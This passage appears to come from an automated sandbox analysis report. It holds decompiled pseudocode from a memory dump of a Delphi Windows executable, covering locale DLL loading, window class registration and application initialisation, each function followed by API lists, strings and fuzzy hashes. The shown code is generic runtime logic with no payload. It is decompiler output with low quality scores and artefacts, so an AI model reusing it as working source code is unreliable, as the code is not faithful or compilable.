													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
												}
											}
										}
									}
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t267 =  *0x492c08; // 0x237094c
							E00453D74(_t267);
							E004547D0(_t372);
							goto L99;
						}
						_t270 = _t161 - 0x1a;
						__eflags = _t270;
						if(_t270 == 0) {
							_t271 =  *0x491244; // 0x492b6c
							E004408B4( *_t271, _t312,  *(_v12 + 4));
							E00454764(_v8, _t303, _t312, _v12, _t365);
							E004547D0(_t372);
							goto L99;
						}
						__eflags = _t270 == 2;
						if(_t270 == 2) {
							E004547D0(_t372);
							_t279 = _v12;
							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
							_t281 = _v12;
							__eflags =  *(_t281 + 4);
							if( *(_t281 + 4) == 0) {
								E00454660();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E00454670(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						_t292 = _v12;
						__eflags =  *(_t292 + 4);
						if( *(_t292 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L99;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L98;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M004548FC))) {
						case 0:
							__eax = E0041C04C();
							goto L99;
						case 1:
							goto L98;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L004070D4();
							__eax = E004547D0(__ebp);
							goto L99;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E004547D0(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0044C628( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00454668();
							} else {
								_v8 = E00454670(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E004547D0(__ebp);
							}
							goto L99;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L00407034();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E004547D0(__ebp);
							} else {
								__eax = E0045480C(__ebp);
							}
							goto L99;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00451FDC(__eax, __ecx);
							}
							goto L99;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E004547D0(__ebp);
							goto L99;
					}
				} else {
					_t311 = _t301 + 1;
					_t371 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E004141BC( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t361);
						 *[fs:eax] = _t361;
					}
					L100:
					return _t166;
					L4:
					_t371 = _t371 + 1;
					_t311 = _t311 - 1;
					__eflags = _t311;
					if(_t311 != 0) {
						goto L2;
					}
					goto L5;
				}
			}

Strings

RegisterAutomation, xrefs: 00454C51
vcltest3.dll, xrefs: 00454C30
l+I, xrefs: 00454E9D

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RegisterAutomation$l+I$vcltest3.dll
API String ID: 0-4006344421
Opcode ID: 551802912116d392e2c24e73020adaaa035bafcefbe6d28391d05005abe235d2
Instruction ID: ce7447678082689d4ce0267b8534b48c9ee2a8186bb98f6d1640a9c28f0ad015
Opcode Fuzzy Hash: 551802912116d392e2c24e73020adaaa035bafcefbe6d28391d05005abe235d2
Instruction Fuzzy Hash: 8BE16034604508EFDB10DB59C58AA5EB7F1BB84319F1481AAEC049F357C738EE89DB49

Uniqueness

Uniqueness Score: -1.00%

Function 00405DAC, Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00405DAC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401338();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401340();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401338();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401338();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401338();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF

Strings

Software\Borland\Locales, xrefs: 00405CD0, 00405CEE
Software\Borland\Delphi\Locales, xrefs: 00405D0C

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
Instruction ID: a95c978ba0d7d151ab845f00ccb1e953877a4a526e1e70593208f9c5fde5a4dc
Opcode Fuzzy Hash: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
Instruction Fuzzy Hash: 6F318F71E0061C6AFB25D6B8DC46BDF6AAC8B04344F4401F7AA44F61C1E6789F848F94

Uniqueness

Uniqueness Score: -1.00%

Function 004547D0, Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004547D0(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00406D8C(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}

0x004547dc
0x004547e6
0x004547ef
0x004547f6
0x004547f9
0x004547fa
0x00454805
0x00454809

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004547FA

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 598302c28e7f559f112a55e5b7a9db3990e1a77f1ad0f75a23d62069af91447a
Instruction ID: 5803e6755cc40272ac919c0989782a04df59f5dce5c0c45c60d630398e48ec52
Opcode Fuzzy Hash: 598302c28e7f559f112a55e5b7a9db3990e1a77f1ad0f75a23d62069af91447a
Instruction Fuzzy Hash: 44F0C579215608AFCB40DF9DC588D4AFBE8BF4C260B058195BD88CB321C234FD808F94

Uniqueness

Uniqueness Score: -1.00%

Function 0045433C, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 130
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0045433C(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				intOrPtr* _t28;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				struct HINSTANCE__* _t36;
				void* _t38;
				CHAR* _t39;
				struct HWND__* _t40;
				char* _t46;
				char* _t51;
				long _t54;
				long _t58;
				struct HINSTANCE__* _t61;
				intOrPtr _t63;
				void* _t68;
				struct HMENU__* _t69;
				intOrPtr _t76;
				void* _t82;
				short _t87;

				_v48 = 0;
				_t68 = __eax;
				_push(_t82);
				_push(0x4544d3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x4544da);
					return E00404348( &_v48);
				}
				_t22 =  *0x491180; // 0x492048
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E0041D1FC(E00454858, __eax); // executed
				 *(_t68 + 0x40) = _t23;
				_t25 =  *0x476c5c; // 0x454024
				_t26 =  *0x492714; // 0x400000
				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
					_t61 =  *0x492714; // 0x400000
					 *0x476c48 = _t61;
					_t87 = RegisterClassA(0x476c38);
					if(_t87 == 0) {
						_t63 =  *0x490f30; // 0x41d508
						E00406548(_t63,  &_v48);
						E0040A158(_v48, 1);
						E00403DA8();
					}
				}
				_t28 =  *0x490fe4; // 0x492a9c
				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_t32 =  *0x490fe4; // 0x492a9c
				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t35);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t36 =  *0x492714; // 0x400000
				_push(_t36);
				_push(0);
				_t7 = _t68 + 0x8c; // 0x297c0044
				_t38 = E004047F8( *_t7);
				_t39 =  *0x476c5c; // 0x454024, executed
				_t40 = E0040731C(_t39, 0x84ca0000, _t38); // executed
				 *(_t68 + 0x30) = _t40;
				_t9 = _t68 + 0x8c; // 0x44c534
				E00404348(_t9);
				 *((char*)(_t68 + 0xa4)) = 1;
				_t11 = _t68 + 0x40; // 0x10ac0000
				_t12 = _t68 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t46 =  *0x491050; // 0x492b70
				if( *_t46 != 0) {
					_t54 = E00454F30(_t68);
					_t13 = _t68 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t54); // executed
					_t58 = E00454F30(_t68);
					_t14 = _t68 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t58);
				}
				_t15 = _t68 + 0x30; // 0xe
				_t69 = GetSystemMenu( *_t15, 0);
				DeleteMenu(_t69, 0xf030, 0);
				DeleteMenu(_t69, 0xf000, 0);
				_t51 =  *0x491050; // 0x492b70
				if( *_t51 != 0) {
					DeleteMenu(_t69, 0xf010, 0);
				}
				goto L13;
			}

APIs

Part of subcall function 0041D1FC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D21A

GetClassInfoA.USER32 ref: 00454391
RegisterClassA.USER32 ref: 004543A9

Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579

SetWindowLongA.USER32 ref: 00454445
SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00454467
SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 0045447A
GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 00454485
DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 00454494
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 004544A1
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 004544B8

Strings

H I, xrefs: 00454365
$@E, xrefs: 00454385, 0045441C
p+I, xrefs: 0045444A, 004544A6

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
String ID: $@E$H I$p+I
API String ID: 2103932818-221982857
Opcode ID: 685e67a81e4949c604ffaa2b2dc12700fa6c6165387320308f4e2d3abc947387
Instruction ID: 7e8550c6c2abfd000bb9715b8e91fcd243a38e858309014aef8d95fae1ef381b
Opcode Fuzzy Hash: 685e67a81e4949c604ffaa2b2dc12700fa6c6165387320308f4e2d3abc947387
Instruction Fuzzy Hash: 94415F707402406FEB11EB69DC82F5A37E8AB55308F154076FE00EF2E7DAB8A844872C

Uniqueness

Uniqueness Score: -1.00%

Function 00440D14, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00440D14(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x440e8c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E00409348("Delphi%.8X", 0,  &_v16,  &_v8);
				E0040439C(0x492b7c, _v8);
				_t25 =  *0x492b7c; // 0x23708a8
				 *0x492b78 = GlobalAddAtomA(E004047F8(_t25));
				_t29 =  *0x492714; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E00409348("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E0040439C(0x492b80, _v20);
				_t35 =  *0x492b80; // 0x23708c4
				 *0x492b7a = GlobalAddAtomA(E004047F8(_t35));
				_t38 =  *0x492b80; // 0x23708c4
				 *0x492b84 = RegisterClipboardFormatA(E004047F8(_t38));
				 *0x492bbc = E004146F8(1);
				E00440918();
				 *0x492b6c = E00440740(1, 1);
				_t47 = E00452F50(1, __edi);
				_t78 =  *0x491278; // 0x492c08
				 *_t78 = _t47;
				_t49 = E00454034(0, 1);
				_t80 =  *0x49111c; // 0x492c04
				 *_t80 = _t49;
				_t50 =  *0x49111c; // 0x492c04
				E00455B40( *_t50, 1);
				_t53 =  *0x4307c4; // 0x4307c8
				E00413978(_t53, 0x432c88, 0x432c98);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x4768fc = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x440e93);
				E00404348( &_v20);
				return E00404348( &_v8);
			}

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00440E8C), ref: 00440D35
GlobalAddAtomA.KERNEL32 ref: 00440D68
GetCurrentThreadId.KERNEL32 ref: 00440D83
GlobalAddAtomA.KERNEL32 ref: 00440DB9
RegisterClipboardFormatA.USER32 ref: 00440DCF

Part of subcall function 004146F8: RtlInitializeCriticalSection.KERNEL32(00411A44,?,?,00440DE5,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00414717

Part of subcall function 00440918: SetErrorMode.KERNEL32(00008000), ref: 00440931
Part of subcall function 00440918: GetModuleHandleA.KERNEL32(USER32,00000000,00440A7E,?,00008000), ref: 00440955
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00440962
Part of subcall function 00440918: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00440A7E,?,00008000), ref: 0044097E
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 004409A0
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 004409B5
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 004409CA
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004409DF
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004409F4
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00440A09
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00440A1E
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00440A33
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00440A48
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440A5D
Part of subcall function 00440918: SetErrorMode.KERNEL32(?,00440A85,00008000), ref: 00440A78

Part of subcall function 00452F50: GetKeyboardLayout.USER32(00000000), ref: 00452F95
Part of subcall function 00452F50: GetDC.USER32(00000000), ref: 00452FEA
Part of subcall function 00452F50: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00452FF4
Part of subcall function 00452F50: ReleaseDC.USER32 ref: 00452FFF

Part of subcall function 00454034: LoadIconA.USER32(00400000,MAINICON), ref: 00454119
Part of subcall function 00454034: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440E24,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 0045414B
Part of subcall function 00454034: OemToCharA.USER32(?,?), ref: 0045415E
Part of subcall function 00454034: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440E24,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 0045419E

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00440E53
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440E64

Strings

ControlOfs%.8X%.8X, xrefs: 00440D97
USER32, xrefs: 00440E4E
AnimateWindow, xrefs: 00440E5E
Delphi%.8X, xrefs: 00440D46

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$CapsClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterReleaseSectionThread
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 2984857458-1126952177
Opcode ID: ae3d390876d2bc8afa20dae0fcc9a51e401959e281f9ddfb79b2c3f765abf0bd
Instruction ID: 356f96267dbb7d90c54aca1b36ca1d1b9089d299676edc16670ffe8150a110ea
Opcode Fuzzy Hash: ae3d390876d2bc8afa20dae0fcc9a51e401959e281f9ddfb79b2c3f765abf0bd
Instruction Fuzzy Hash: 8741A2B46002059FDB00FFB5DD92A9E77E5EB99308B11443BF504E73A2DB7869108B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00454034, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 125
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00454034(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403940(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E0041C178(_t91, 0);
				_t42 =  *0x491094; // 0x476468
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x491094; // 0x476468
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x455668;
				}
				_t43 =  *0x491138; // 0x476470
				_t109 =  *((short*)(_t43 + 2));
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x491138; // 0x476470
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E00455860;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E004035AC(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E004035AC(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E00425C10(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x490fc8; // 0x49202c
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E00425FE0(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x455dd0;
				_t60 =  *0x490fc8; // 0x49202c
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040ACC4(0x5c, _t109);
				_t110 = _t67;
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00408C10( &_v261, _t27);
				}
				_t69 = E0040ACEC( &_v261, 0x2e, _t110);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x44c534
				E004045B0(_t31, 0x100,  &_v261);
				_t75 =  *0x490ec0; // 0x492034
				if( *_t75 == 0) {
					E0045433C(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E00455FAC(_t90, 0x100);
				E004568EC(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403998(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

0x00454034
0x00454034
0x00454041
0x00454043
0x00454046
0x00454046
0x0045404b
0x0045404e
0x00454054
0x00454059
0x00454063
0x00454065
0x0045406a
0x0045406d
0x0045406d
0x00454073
0x00454078
0x0045407d
0x0045407f
0x00454084
0x00454087
0x00454087
0x0045408d
0x0045409d
0x004540af
0x004540b7
0x004540bc
0x004540c2
0x004540c9
0x004540d0
0x004540d6
0x004540dc
0x004540e3
0x004540ea
0x004540f1
0x00454104
0x00454106
0x00454111
0x00454119
0x00454122
0x00454127
0x00454127
0x0045412d
0x00454130
0x00454143
0x0045414b
0x0045415e
0x0045416b
0x00454170
0x00454172
0x00454174
0x0045417d
0x0045417d
0x0045418a
0x00454191
0x00454193
0x00454193
0x0045419e
0x004541a3
0x004541b4
0x004541b9
0x004541c1
0x004541c5
0x004541c5
0x004541ca
0x004541ce
0x004541d2
0x004541d6
0x004541df
0x004541e7
0x004541ee
0x004541f3
0x004541f9
0x004541fb
0x00454200
0x00454207
0x00454211

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 00454119
GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440E24,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 0045414B
OemToCharA.USER32(?,?), ref: 0045415E
CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440E24,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 0045419E

Strings

